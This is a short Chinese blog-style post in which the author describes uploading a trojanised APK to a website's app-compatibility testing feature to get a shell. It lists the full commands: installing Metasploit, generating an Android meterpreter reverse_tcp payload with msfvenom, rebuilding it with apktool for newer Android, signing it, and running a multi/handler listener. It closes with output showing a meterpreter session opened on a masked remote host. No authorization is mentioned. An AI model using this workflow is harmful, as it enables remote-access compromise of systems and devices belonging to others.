今儿遇见个站,有个功能是上传apk做兼容性测试,那一看能上传文件执行就想到传马上线
安装msf:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
生成马:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=5555 > sdf.apk
msf生成的马新版本安卓打不开,需要逆向后重新编译
下载apktool
https://ibotpeaches.github.io/Apktool/
和刚才的马放到同一个目录下,路径不要有中文,打包的时候会出错
解包
java -jar .\apktool_2.10.0.jar d -f .\sdf.apk -o ama
进到ama目录下,把apktool.yml里的sdkInfo改成如下
sdkInfo:
minSdkVersion: 16
targetSdkVersion: 23
重新打包:
java -jar .\apktool_2.10.0.jar b .\ama\ -o new.apk
生成签名证书:
keytool -genkeypair -alias sss -keyalg RSA -validity 100 -keystore sss.jks
签名:
jarsigner -verbose -keystore sss.jks -signedjar hhh.apk new.apk sss
开msfconsole:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 5555
run
运行上线:
msf6 exploit(multi/handler) > run
[-] Handler failed to bind to xxx.xxx.xxx.xxx:50001:- -
[*] Started reverse TCP handler on 0.0.0.0:50001
[*] Sending stage (72424 bytes) to xxx.xxx.xxx.xxx
[*] Meterpreter session 1 opened (172.28.198.158:50001 -> xxx.xxx.xxx.xxx:28082) at 2024-12-13 17:36:35 +0800